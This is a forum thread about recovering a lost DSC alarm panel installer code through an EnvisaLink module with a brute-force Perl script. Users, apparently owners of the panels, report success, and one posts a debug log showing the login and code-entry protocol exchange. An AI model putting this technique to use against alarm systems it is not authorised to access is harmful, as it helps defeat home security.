[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky
Top
JPWood17
Posts: 1
Joined: Sat Aug 29, 2020 3:55 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by JPWood17 »

To Smith and edirol,

I want to thank both of you for your code and explanations of discovering the installer code. My DSC 1832 was installed 3 yearts ago in my newly-built home by whoever the builder used at the time. Naturally, the installer code was a secret and said installer never even returned my calls about paying him to reset the code to default.

This thread (and EVL4!) was the key. After some very minor program tweaks, a terminal session on my Mac had the answer after about 6 hours.

Thanks, again. You guys are the best.
Top
mJack
Posts: 1
Joined: Fri Sep 18, 2020 1:48 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mJack »

Hi there,

I am currently trying the perl script but it seem that I am in a loop. I also do not have any logs created in the txt file and I do not see any code attemp (I've try yesterday for hours and its identical as the below sample).

EVL3
DSC PC1616

Device:folder users$ perl -w dsc.pl
Name "main::t" used only once: possible typo at dsc.pl line 54.
[20200918_125615] DEBUG: Connected to EnvisaLink
[20200918_125615] response: '5053CD\r\n' (length 8)
[20200918_125615] sent data '005user54\r\n' (length 11)
[20200918_125615] response: '5000052A\r\n5051CB\r\n' (length 18)
[20200918_125615] DEBUG: Correct EnvisaLink password
[20200918_125615] DEBUG: Start installer mode entry cycle
[20200918_125615] sent data '0711*82B\r\n' (length 10)
[20200918_125615] response: '5000712D\r\n' (length 10)
[20200918_125616] response: '51080FE\r\n8411CE\r\n9229D\r\n' (length 24)
[20200918_125644] response: '5109100\r\n6501CC\r\n8401CD\r\n' (length 25)
[20200918_125649] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_125649] response: '51080FE\r\n' (length 9)
[20200918_125650] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
[20200918_130059] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130100] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130452] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_130457] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_130509] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130510] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_130624] response: '60900433\r\n6531CF\r\n' (length 18)
[20200918_130627] response: '6100042B\r\n' (length 10)
[20200918_130628] response: '6501CC\r\n' (length 8)
[20200918_130919] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_130920] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_131044] response: '60900130\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131139] response: '61000128\r\n5109100\r\n6501CC\r\n' (length 27)
[20200918_131155] response: '60900332\r\n' (length 10)
[20200918_131156] response: '6531CF\r\n' (length 8)
[20200918_131200] response: '6100032A\r\n' (length 10)
[20200918_131200] response: '6501CC\r\n' (length 8)
[20200918_131221] response: '60900231\r\n51090FF\r\n6511CD\r\n' (length 27)
[20200918_131329] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131330] response: '51080FE\r\n51100F7\r\n51090FF\r\n6511CD\r\n' (length 35)
[20200918_131545] response: '60900332\r\n' (length 10)
[20200918_131546] response: '61000229\r\n5109100\r\n6531CF\r\n' (length 27)
[20200918_131550] response: '6100032A\r\n' (length 10)
[20200918_131550] response: '6501CC\r\n' (length 8)
[20200918_131739] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_131740] response: '51080FE\r\n51100F7\r\n5109100\r\n6501CC\r\n' (length 35)
[20200918_132007] response: '60900332\r\n6531CF\r\n' (length 18)
[20200918_132011] response: '6100032A\r\n6501CC\r\n' (length 18)
[20200918_132150] response: '51110F8\r\n849090E\r\n' (length 18)
[20200918_132150] response: '51080FE\r\n' (length 9)
[20200918_132150] response: '51100F7\r\n5109100\r\n6501CC\r\n' (length 26)
...

any idea?

Much appreciated.
thanks!
Mike
Top
TurboMP
Posts: 1
Joined: Sun Oct 11, 2020 9:02 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by TurboMP »

To Smith and Edirol,

I must say THANKS!,
This the script worked great.
PC1616 and EVL4.
I set it up via terminal and nano on my Mac waited 30h or so and it worked!
My installer refused to release the code... no need for him now.
Online monitoring here I come (and now I can turn off Communicator options and telephone line monitoring) :)
Top
Post Reply

Return to “EnvisaLink ( IP100D, IP170D, 2DS, 3, 4)”